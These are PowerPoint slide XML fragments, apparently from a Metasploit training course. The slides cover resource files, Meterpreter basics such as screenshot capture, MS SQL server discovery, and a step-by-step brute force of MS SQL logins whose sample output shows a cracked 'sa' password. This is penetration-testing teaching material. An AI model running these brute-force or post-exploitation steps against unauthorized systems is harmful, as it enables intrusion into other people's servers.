            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Sessions –I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Exploit = run </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26773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91751" y="2435289"/>
            <a:ext cx="12008498" cy="4254759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Metasploit Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel. We consider the MSF to be one of the single most useful security auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22490313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E1A218-8A09-05BD-E034-7941259EF386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518984" y="2051222"/>
            <a:ext cx="9848335" cy="3212756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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 name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25592C1-92A0-1BCB-A7AB-99948EED7665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="84379"/>
            <a:ext cx="2270173" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resource Files</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E73DBEC-3F6C-EDCD-9E30-618E89748177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852616" y="607599"/>
            <a:ext cx="8253285" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Resource files are script files that automate commands within msfconsole. They</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>contain a list of commands that are executed from msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0559B7-E89A-1504-FD74-DDF419F0EF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852616" y="2503438"/>
            <a:ext cx="6664004" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>m3lomat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> echo version &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.rc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@m3lomat:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  echo load sounds &gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autodo.rc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@m3lomat:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  msfconsole –r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autodo.rc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>resource (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autodo.rc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; version</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Framework: 6.2.26-dev</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Console :  6.2.26-dev</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>resource (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autodo.rc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; load autodo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Successfully loaded plugin: autodo</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219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1772378" y="324153"/>
            <a:ext cx="8647244" cy="244259"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>METERPRETER</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79EBC672-E5AC-25E1-0B3F-6F5FD5078395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643507" y="1443850"/>
            <a:ext cx="3727367" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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use scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mssql_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{916A14DD-C5FC-05D8-2692-6A5EC4625C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172993" y="1052441"/>
            <a:ext cx="2977979" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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MS SQL</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D16389-FDD7-F25D-5CF5-D79683D8A142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197706" y="2442399"/>
            <a:ext cx="4249881"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Brute Forcing MS SQL Server</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D60B61-D87F-A7BC-A60C-8E1548161237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000897" y="3286897"/>
            <a:ext cx="7822911" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mssql_login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set PASS_FILE Wordlist.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>set RHOSTS &lt;HOST&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set THREADS 11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>[+] 192.168.1.1:1433 - MSSQL - successful login '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>' : ‘pass20000'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51061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5E951E-EDE3-48F8-F331-4BA83F4F15C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4317207"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Basic Meterpreter Commands</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3B0BE5-442F-6EAA-6DDB-0CBCCA8F7ECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598139" y="1011973"/>
            <a:ext cx="9448801" cy="769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TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC346636-4468-F4FC-FD67-55169D1596A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605481" y="642669"/>
            <a:ext cx="2954655" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Capturing a Screenshot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C5C3C2-5194-5FD3-1150-13D2FB16AEFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1820229" y="1131422"/>
            <a:ext cx="8172601" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; screenshot</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> saved to: /opt/metasploit3/msf3/yVHXaZar.jpeg</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46AC804-66D8-3FCC-0C81-71DE00236153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605481" y="1777753"/>
            <a:ext cx="1203471" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
